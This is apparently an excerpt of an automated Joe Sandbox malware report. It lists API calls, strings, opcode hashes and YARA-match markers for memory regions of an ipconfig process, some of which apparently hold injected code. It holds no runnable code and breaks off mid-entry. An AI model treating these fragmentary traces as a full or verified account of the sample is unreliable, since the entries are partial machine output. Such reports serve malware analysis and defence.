                                                                                              • Instruction ID: db1dc2b59ee473552f25f6dd7d6364a08950a2b64fad76ab455898e52a892e9b
                                                                                              • Opcode Fuzzy Hash: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
                                                                                              • Instruction Fuzzy Hash: D3F0EDB5200259AFCB10DF58CC84FDBBBA8EF88640F118198FE0C5B242CA30A811CBF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(001E4536,?,001E4CAF,001E4CAF,?,001E4536,?,?,?,?,?,00000000,00000000,?), ref: 001EA65D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                              • Instruction ID: dfe76e3bb10493300c61a850058e9c9af80f05d316b848c3cc3873e2c48c2de6
                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                              • Instruction Fuzzy Hash: C7E046B1200208ABDB14EF99CC41EAB77ACEF88754F118558FE085B242C630F910CBF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1D2,001DF1D2,?,00000000,?,?), ref: 001EA800
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                              • Instruction ID: c911a41c6827853bf5f0d7a86b492a1b4bfcd10b63645bb9ba1890d2e8d5651e
                                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                              • Instruction Fuzzy Hash: 6AE01AB1200208ABDB10DF59CC85EEB37ADEF88650F118154BA0857241CA30F8108BF5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008003,?,001D8D14,?), ref: 001DF6FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                              • Instruction ID: 3c6063d180d580dde8fee5d7b7e8b3255b79cdab80299f152a435bf56a52f7ec
                                                                                              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                              • Instruction Fuzzy Hash: C8D0A7727503083BE710FAA59C03F2632CC6B54B00F490074F949D73C3EE54F5014165
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: b594aa2c143c97382829aa5f35a182ff1fffb02841cc70664398e62704e26fde
                                                                                              • Instruction ID: 169c5be14fd762fe38c337caf1621b6e8c87a91770faa68c17ca17204a33bb5c
                                                                                              • Opcode Fuzzy Hash: b594aa2c143c97382829aa5f35a182ff1fffb02841cc70664398e62704e26fde
                                                                                              • Instruction Fuzzy Hash: 3FB09272906DC5CAEB91E7604A08B1B7A00ABD0701F2AC062E30347A6E4738C6D1F2B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(000008FF,00000000,00000000,?,00000014,00000000), ref: 00C73BEE
                                                                                              • ConvertLengthToIpv4Mask.IPHLPAPI(?,00000000), ref: 00C73C4F
                                                                                              • InetNtopW.WS2_32(00000002,?,?,00000041), ref: 00C73C79
                                                                                                • Part of subcall function 00C73096: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00C730B1
                                                                                                • Part of subcall function 00C73096: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00C730BF
                                                                                                • Part of subcall function 00C73096: GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00C730D9
                                                                                                • Part of subcall function 00C73096: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00C730E5
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00C73F4C
                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C73F53
                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00C73FCE
                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C73FD5
                                                                                                • Part of subcall function 00C73901: RtlIpv4AddressToStringExW.NTDLL ref: 00C73918
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00C74141
                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,?,?,?,?), ref: 00C74151
                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,000000C6,00000000,00000000,?), ref: 00C74167
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00C74190
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Local$FreeHeapTime$FileFormat$AllocIpv4MessageProcess$AdaptersAddressAddressesConvertDateErrorInetLastLengthMaskNtopStringSystem__iob_func
                                                                                              • String ID: %02X-$A
                                                                                              • API String ID: 2780012581-292374352
                                                                                              • Opcode ID: 5167cc1c5b65d1d681e3419c7f8328ab691b120d899c05684dad376c3b64dbb1
                                                                                              • Instruction ID: 35d941c3184e4f6cd86d96e91bef715af63973ec91d21906a48d414cef6ab494
                                                                                              • Opcode Fuzzy Hash: 5167cc1c5b65d1d681e3419c7f8328ab691b120d899c05684dad376c3b64dbb1
                                                                                              • Instruction Fuzzy Hash: B122BD71A14215AFDB28AB64CC86FEAB37CFF04710F048199F91DAB181DB719F849B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00C752D6,00C71000), ref: 00C751A7
                                                                                              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00C752D6,?,00C752D6,00C71000), ref: 00C751B0
                                                                                              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00C752D6,00C71000), ref: 00C751BB
                                                                                              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00C752D6,00C71000), ref: 00C751C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 3231755760-0
                                                                                              • Opcode ID: 3065dcbb460aa3e609b7af6783cbfaa34299543b7cbd6de8178f283f74738b36
                                                                                              • Instruction ID: 3c5ea43b66ce11124972d8cdf34555c94670b29962140b12d4c12c4bb4a78687
                                                                                              • Opcode Fuzzy Hash: 3065dcbb460aa3e609b7af6783cbfaa34299543b7cbd6de8178f283f74738b36
                                                                                              • Instruction Fuzzy Hash: 65D0C93200820CABDB002BF1EC0CB4D3F2CEB48212F048110F30E82060CA7144818B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DnsGetCacheDataTableEx.DNSAPI(00000001,00000000,?), ref: 00C73885
                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00C738E8
                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00C738F0
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$CacheDataFormatLocalMessageTable__iob_func
                                                                                              • String ID:
                                                                                              • API String ID: 2186664420-0
                                                                                              • Opcode ID: 272f03d9d8414deecbe4b598f1df05f6d4bf8829072b44c4d5c1d958634e888f
                                                                                              • Instruction ID: 7ab8cd66e4be3db7c06828ba10601f5500097b559f4130d10ef6380f8fe41079
                                                                                              • Opcode Fuzzy Hash: 272f03d9d8414deecbe4b598f1df05f6d4bf8829072b44c4d5c1d958634e888f
                                                                                              • Instruction Fuzzy Hash: EE01A5B1604764ABD724AB51CD86B6B73A9EF90B90714C42AB4AE571C0DB71AF40A260
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C74AFB
                                                                                              • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 00C74B10
                                                                                              • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 00C74B23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: f2963788174c0584e4ac8a977f12dca22bebb43a5deee3127d11cdd9e858a395
                                                                                              • Instruction ID: 2bee025de761c93f761a37533cd1bec8ca948e56f6117147d34a21b899bc4d20
                                                                                              • Opcode Fuzzy Hash: f2963788174c0584e4ac8a977f12dca22bebb43a5deee3127d11cdd9e858a395
                                                                                              • Instruction Fuzzy Hash: 2C0116B1A0420EABDF00DFA1CD85ABEB7B9FB04300F904569A52AA2140D770DA44DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00C726B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2086374402-0
                                                                                              • Opcode ID: 4ac74debe115eaf38c357930c48406332e1e61f62800a6a96a8d1b5dfdb9d09a
                                                                                              • Instruction ID: a9190d8287f2e6bcd30742905e41dec94742305cf6fb2a5e9be7ad924e56f50a
                                                                                              • Opcode Fuzzy Hash: 4ac74debe115eaf38c357930c48406332e1e61f62800a6a96a8d1b5dfdb9d09a
                                                                                              • Instruction Fuzzy Hash: 36D0A733018229BBCB502F95DC04C8ABBB9EF95331350C326F5AC41061DFB19C50D7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000053A0), ref: 00C753F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 6f46b8000865d048fc6dca2ddae77f0e0f6015e5dbb01058795d9a0ac7e28368
                                                                                              • Instruction ID: 7e5509e1b668fe5dd7eb413ef21da1cf2c16eeb6c1e6e07d2efd87d2a0ddb678
                                                                                              • Opcode Fuzzy Hash: 6f46b8000865d048fc6dca2ddae77f0e0f6015e5dbb01058795d9a0ac7e28368
                                                                                              • Instruction Fuzzy Hash: E7900264255604D68B001B706D4960A6A946B4C6527D18560B019C8074DAE550405561
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00C7470F
                                                                                              • setlocale.MSVCRT ref: 00C7471B
                                                                                              • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 00C74724
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74C73: fgetpos.MSVCRT ref: 00C74CA8
                                                                                                • Part of subcall function 00C74C73: _fileno.MSVCRT ref: 00C74CC2
                                                                                                • Part of subcall function 00C74C73: _setmode.MSVCRT ref: 00C74CCA
                                                                                                • Part of subcall function 00C74C73: fwprintf.MSVCRT ref: 00C74CD6
                                                                                              • exit.MSVCRT ref: 00C747E5
                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00C74807
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C74827
                                                                                                • Part of subcall function 00C731D0: DnsResolverOp.DNSAPI(00000002,00000000,00000000), ref: 00C731D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatFreeHeapInformationLanguageLocalMessageResolverThread__iob_func_fileno_setmodeexitfgetposfwprintfsetlocale
                                                                                              • String ID: all$allcompartments$debug$displaydns$flushdns$registerdns$release$release6$renew$renew6$setclassid$setclassid6$showclassid$showclassid6
                                                                                              • API String ID: 1456437472-1517225019
                                                                                              • Opcode ID: 47cc61ca0cd80c9844eca4c251652f0dfc1166b7d499e7e5d8db3908f68802f8
                                                                                              • Instruction ID: a1fa24a742fab294cfa3ab6c7b27bb86658d4733c535361c3b95f7cac7f2e8a7
                                                                                              • Opcode Fuzzy Hash: 47cc61ca0cd80c9844eca4c251652f0dfc1166b7d499e7e5d8db3908f68802f8
                                                                                              • Instruction Fuzzy Hash: 3C819E75508341DB8B19EF21D84692FB7E8EBC0764F24CA1EF9AE57280DB708944EB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • fflush.MSVCRT ref: 00C74D51
                                                                                                • Part of subcall function 00C74B41: _fileno.MSVCRT ref: 00C74B4C
                                                                                                • Part of subcall function 00C74B41: _get_osfhandle.MSVCRT ref: 00C74B53
                                                                                              • _fileno.MSVCRT ref: 00C74D71
                                                                                              • _setmode.MSVCRT ref: 00C74D79
                                                                                              • wcschr.MSVCRT ref: 00C74D9C
                                                                                              • _fileno.MSVCRT ref: 00C74DC2
                                                                                              • _setmode.MSVCRT ref: 00C74DCA
                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00C74DE8
                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00C74DF8
                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00C74E16
                                                                                              • _fileno.MSVCRT ref: 00C74E23
                                                                                              • _write.MSVCRT ref: 00C74E2B
                                                                                              • fwprintf.MSVCRT ref: 00C74E3C
                                                                                              • fflush.MSVCRT ref: 00C74E46
                                                                                              • _fileno.MSVCRT ref: 00C74E4F
                                                                                              • _setmode.MSVCRT ref: 00C74E57
                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C74E64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
                                                                                              • String ID: %ls
                                                                                              • API String ID: 2233937912-3246610740
                                                                                              • Opcode ID: fdd7b52301482fd5ff3443c1f285729094796028a85bd9ff2a0e814126a977ad
                                                                                              • Instruction ID: c944f40cb5c919efe2796838862b6d4726c01bf06de5b3545cf21fc3209d6f80
                                                                                              • Opcode Fuzzy Hash: fdd7b52301482fd5ff3443c1f285729094796028a85bd9ff2a0e814126a977ad
                                                                                              • Instruction Fuzzy Hash: EA318271908218FFEB155BA4EC09FAEBB78EB45321F208165F92DE1190DB744A418F14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00C72340
                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C723D3
                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00C723EC
                                                                                              • memcpy.MSVCRT ref: 00C7241A
                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00C7243B
                                                                                                • Part of subcall function 00C72260: memset.MSVCRT ref: 00C7228A
                                                                                                • Part of subcall function 00C72260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF
                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,00000001,?,00000000,00000002,?), ref: 00C72491
                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00C7249D
                                                                                              • memset.MSVCRT ref: 00C724AD
                                                                                              • DhcpHandlePnPEvent.DHCPCSVC(00000000,00000001,?,?,00000000), ref: 00C724C9
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00C72524
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeStringmemset$Unicode$CloseConvertDhcpEventFormatFromGuidHandleInterfaceLocalLuidMessageOpenValue__iob_funcmemcpy
                                                                                              • String ID: DhcpClassId$PIdu$p<Qw
                                                                                              • API String ID: 4056406669-2584887344
                                                                                              • Opcode ID: 4a83768a526ca62e99a84026d467babdc5adb14057c8b87cf9caac65802fc1cb
                                                                                              • Instruction ID: 83813155ff9e24d6ae5546826195561c4cb385e92376de851d62ae71b8cb1375
                                                                                              • Opcode Fuzzy Hash: 4a83768a526ca62e99a84026d467babdc5adb14057c8b87cf9caac65802fc1cb
                                                                                              • Instruction Fuzzy Hash: D261F572E00208AFDB249BA4CC55FAFB3BDEF88300F0485A9E55ED7251DA709E819B11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C72D48
                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00C72D5E
                                                                                              • memcpy.MSVCRT ref: 00C72D83
                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00C72DA2
                                                                                                • Part of subcall function 00C72C01: memset.MSVCRT ref: 00C72C2B
                                                                                                • Part of subcall function 00C72C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80
                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,00000001,?,00000000,00000002,?), ref: 00C72DED
                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00C72DF6
                                                                                              • Dhcpv6SetUserClass.DHCPCSVC6(?,?,?), ref: 00C72E16
                                                                                                • Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E
                                                                                                • Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
                                                                                                • Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE
                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00C72E6F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$Unicode$ClassCloseConvertDhcpv6FormatFromGuidInterfaceLocalLuidMessageOpenUserValue__iob_funcmemcpymemset
                                                                                              • String ID: Dhcpv6ClassId$PIdu$p<Qw
                                                                                              • API String ID: 3741014365-1303980570
                                                                                              • Opcode ID: 29a6a9d56308165484d7f777dc491125ab3fc3ead5cf459c3a94375d712d09ad
                                                                                              • Instruction ID: 373ae005e4d482eb433d53531aefea8d86b975926726e7ceb1932b75a8ebc322
                                                                                              • Opcode Fuzzy Hash: 29a6a9d56308165484d7f777dc491125ab3fc3ead5cf459c3a94375d712d09ad
                                                                                              • Instruction Fuzzy Hash: 6E513932A006089BDB259FA8DC45BAFB7B9FF84701F24812EF95ED7281DB709941DB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 9c55fee942633e4257db4d8e76450e42ea282a1f780f3c1fcb94c4cedf5ff993
                                                                                              • Instruction ID: 8b2e260609c6a9df2828eedc7a0e5eb1320f595c030b13259331358989508c75
                                                                                              • Opcode Fuzzy Hash: 9c55fee942633e4257db4d8e76450e42ea282a1f780f3c1fcb94c4cedf5ff993
                                                                                              • Instruction Fuzzy Hash: 5F51F5B2A00156BFDB90DBA88890A7FF7B8FF48305B508169E9A5D7641D334DF04CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
